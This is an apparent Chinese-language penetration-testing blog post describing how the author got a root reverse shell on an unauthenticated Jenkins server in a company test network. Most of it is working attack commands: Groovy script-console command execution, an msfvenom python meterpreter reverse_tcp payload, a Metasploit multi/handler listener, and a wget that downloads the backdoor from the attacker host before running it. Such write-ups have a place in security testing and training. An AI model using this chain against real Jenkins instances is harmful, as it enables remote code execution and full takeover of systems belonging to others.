Jenkins未授权-反弹shell
最近对公司测试网进行渗透,发现了个未授权的Jenkins。
- 发现未授权的Jenkins

- 转到脚本执行处:http://192.168.1.226:9090/script
1
| println "ifconfig".execute().text
|

- 生成反弹shell的脚本
1
| msfvenom -p python/meterpreter/reverse_tcp LHOST=172.16.16.126 LPORT=9901 -f raw >/var/www/html/jdk.py
|

- 开启apache

- Kali中使用msfconsole开启反弹shell监听
1 2 3 4 5 6
| msfconsole msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set lhost 172.16.16.126 msf6 exploit(multi/handler) > set lport 9901 msf6 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp msf6 exploit(multi/handler) > run
|

- 接着命令执行通过wget将后门文件jdk.py下载到本机Jenkins目录下,Result没有报错证明执行成功
1
| println "wget http://172.16.16.126/jdk.py -P /".execute().text
|

- 执行后门文件
1
| println "python jdk.py".execute().text
|

- 成功监听上线拿到root权限。
